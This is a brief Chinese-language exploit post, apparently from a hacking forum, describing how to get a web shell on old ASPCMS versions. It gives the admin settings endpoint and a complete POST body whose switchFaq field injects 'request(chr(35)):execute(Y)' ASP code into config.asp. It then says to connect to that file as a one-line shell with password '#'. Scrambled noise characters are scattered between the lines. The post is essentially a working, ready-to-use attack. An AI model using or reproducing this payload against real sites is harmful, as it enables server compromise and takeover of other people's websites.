老的ASPCMS版本的秒杀拿SHELL漏洞
5 o, l) i1 k) F1 `5 p: @! E( T
( A1 u2 `* m8 b! M- o/ v$ |) f2 ? 找到后台。。。然后8 N' E1 B: s) a) Y
: r0 {. R. J6 a% F/admin/_system/AspCms_SiteSetting.asp?action=saves
* V: A' t! S/ F1 T: ?9 u" N
2 Q8 ~4 b$ X6 t; e( S6 `& e直接POST
: {& e* g- e# W4 V
2 ^( R, G/ \" U# TrunMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=14 N: {* t( @5 R/ P1 q
; T0 N" g' F# J) r9 j6 H8 _再连接配置文件config.asp 密码为#
+ A3 |7 k, W2 F8 O6 o0 n |